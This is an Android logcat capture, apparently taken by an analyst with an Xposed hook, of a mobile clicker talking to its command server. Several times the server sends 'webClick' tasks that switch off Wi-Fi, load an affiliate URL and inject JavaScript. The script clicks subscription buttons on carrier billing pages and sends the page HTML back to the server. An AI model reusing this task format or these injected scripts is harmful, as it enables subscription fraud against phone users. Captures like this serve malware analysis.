11-20 03:12:56.338 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"03:12:56 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"03:12:56 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"129903\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 03:13:56.584 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-20 03:13:56.590 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"03:12:56 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"03:12:56 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"129903\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"03:13:56 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 03:15:24.078 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 03:15:24.085 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"03:12:56 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"03:12:56 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"129903\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"03:13:56 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 03:15:25.128 I/Xposed (18830): [+] SERVER: [{"id":254409,"name":"OK"}]
11-20 03:15:25.150 I/Xposed (18830): [+] SERVER: []
11-20 03:16:24.087 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 03:16:25.407 I/Xposed (18830): [+] SERVER: []
11-20 03:17:24.112 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 03:17:25.277 I/Xposed (18830): [+] SERVER: []
11-20 03:18:24.130 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 03:18:25.507 I/Xposed (18830): [+] SERVER: [{"id":564637,"name":"interval","params":{"interval":1800}}]
11-20 03:18:25.588 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"03:18:25 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"564637\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 03:18:25.863 I/Xposed (18830): [+] SERVER: [{"id":186066,"name":"OK"}]
11-20 03:48:50.049 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 03:48:50.998 I/Xposed (18830): [+] SERVER: [{"id":926394,"name":"interval","params":{"interval":1800}}]
11-20 03:48:51.056 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"03:48:51 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"926394\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 03:48:51.286 I/Xposed (18830): [+] SERVER: [{"id":170824,"name":"OK"}]
11-20 04:18:51.136 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 04:18:52.106 I/Xposed (18830): [+] SERVER: [{"id":883785,"name":"interval","params":{"interval":1800}}]
11-20 04:18:52.166 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"04:18:52 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"883785\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 04:18:52.403 I/Xposed (18830): [+] SERVER: [{"id":256805,"name":"OK"}]
11-20 04:51:24.243 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 04:51:25.401 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a12513cc5aef","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":832008,"name":"interval","params":{"interval":60}}]
11-20 04:52:25.677 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"04:52:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 04:52:26.086 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"04:52:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"04:52:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 04:52:26.132 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"04:52:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"04:52:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"04:52:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"832008\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 04:53:26.201 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 04:53:26.209 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"04:52:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"04:52:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"04:52:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"832008\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 04:53:27.007 I/Xposed (18830): [+] SERVER: []
11-20 04:53:27.015 I/Xposed (18830): [+] SERVER: [{"id":224895,"name":"OK"}]
11-20 04:54:26.249 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 04:54:27.062 I/Xposed (18830): [+] SERVER: []
11-20 04:55:26.271 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 04:55:27.253 I/Xposed (18830): [+] SERVER: []
11-20 04:56:26.316 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 04:56:27.577 I/Xposed (18830): [+] SERVER: []
11-20 04:57:26.319 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 04:57:28.407 I/Xposed (18830): [+] SERVER: [{"id":255719,"name":"interval","params":{"interval":1800}}]
11-20 04:57:28.463 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"04:57:28 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"255719\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 04:57:28.715 I/Xposed (18830): [+] SERVER: [{"id":941561,"name":"OK"}]
11-20 05:29:37.747 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 05:29:38.964 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a125a324054c","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":793211,"name":"interval","params":{"interval":60}}]
11-20 05:30:39.257 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"05:30:39 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 05:30:39.551 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"05:30:39 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"05:30:39 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 05:30:39.591 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"05:30:39 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"05:30:39 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"05:30:39 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"793211\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 05:31:39.658 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"05:30:39 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"05:30:39 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"05:30:39 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"793211\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 05:31:39.672 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 05:31:40.497 I/Xposed (18830): [+] SERVER: [{"id":968291,"name":"OK"}]
11-20 05:31:40.507 I/Xposed (18830): [+] SERVER: []
11-20 05:32:39.696 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 05:32:40.726 I/Xposed (18830): [+] SERVER: []
11-20 05:33:39.715 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 05:33:40.515 I/Xposed (18830): [+] SERVER: []
11-20 05:34:39.755 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 05:34:40.837 I/Xposed (18830): [+] SERVER: []
11-20 05:35:39.738 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 05:35:40.527 I/Xposed (18830): [+] SERVER: [{"id":689037,"name":"interval","params":{"interval":1800}}]
11-20 05:35:40.598 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"05:35:40 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"689037\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 05:35:40.827 I/Xposed (18830): [+] SERVER: [{"id":435050,"name":"OK"}]
11-20 06:05:40.633 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 06:05:41.972 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a1262a543bbb","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":266182,"name":"interval","params":{"interval":60}}]
11-20 06:06:42.288 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"06:06:42 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 06:06:42.788 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"06:06:42 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"06:06:42 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 06:06:42.864 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"06:06:42 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"06:06:42 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"06:06:42 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"266182\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 06:07:42.916 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 06:07:42.923 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"06:06:42 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"06:06:42 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"06:06:42 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"266182\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 06:07:43.844 I/Xposed (18830): [+] SERVER: []
11-20 06:07:43.848 I/Xposed (18830): [+] SERVER: [{"id":429771,"name":"OK"}]
11-20 06:08:42.946 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 06:08:43.624 I/Xposed (18830): [+] SERVER: []
11-20 06:09:42.966 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 06:09:43.945 I/Xposed (18830): [+] SERVER: []
11-20 06:10:42.997 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 06:10:44.155 I/Xposed (18830): [+] SERVER: []
11-20 06:11:42.988 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 06:11:44.057 I/Xposed (18830): [+] SERVER: [{"id":512704,"name":"interval","params":{"interval":1800}}]
11-20 06:11:44.135 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"06:11:44 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"512704\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 06:11:44.366 I/Xposed (18830): [+] SERVER: [{"id":587253,"name":"OK"}]
11-20 06:41:44.149 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 06:41:45.177 I/Xposed (18830): [+] SERVER: [{"id":786225,"name":"interval","params":{"interval":1800}}]
11-20 06:41:45.228 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"06:41:45 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"786225\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 06:41:45.466 I/Xposed (18830): [+] SERVER: [{"id":618568,"name":"OK"}]
11-20 07:15:24.088 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 07:15:24.987 I/Xposed (18830): [+] SERVER: [{"id":269300,"name":"interval","params":{"interval":1800}}]
11-20 07:15:25.046 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"07:15:25 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"269300\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 07:15:25.281 I/Xposed (18830): [+] SERVER: [{"id":305604,"name":"OK"}]
11-20 07:45:25.115 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 07:45:26.873 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a127a0634ade","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":651624,"name":"interval","params":{"interval":60}}]
